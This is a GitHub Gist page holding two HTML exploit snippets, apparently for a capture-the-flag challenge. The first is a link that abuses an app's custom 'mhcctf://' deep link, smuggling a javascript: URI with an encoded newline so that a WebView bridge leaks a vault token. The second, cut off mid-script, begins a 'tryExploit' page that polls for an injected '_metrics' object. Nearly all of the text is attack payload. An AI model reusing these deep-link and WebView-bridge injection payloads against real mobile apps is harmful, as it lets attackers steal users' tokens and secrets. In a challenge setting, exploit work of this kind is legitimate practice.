Skip to content

Instantly share code, notes, and snippets.

View Razzkr's full-sized avatar

Raazkr Razzkr

View GitHub Profile
<!DOCTYPE html>
<html><body>
<h1>Click below:</h1>
<a href="mhcctf://app/vault?url=javascript://portal.mhccorp.com/%0adocument.write(MhcVaultBridge.getVaultToken())">GET FLAG</a>
</body></html>
<!DOCTYPE html>
<html>
<head><title>secure.boardingpass.com</title></head>
<body>
<pre id="output">Waiting...</pre>
<script>
function tryExploit() {
try {
if (typeof _metrics === 'undefined') {
document.getElementById('output').textContent += '.';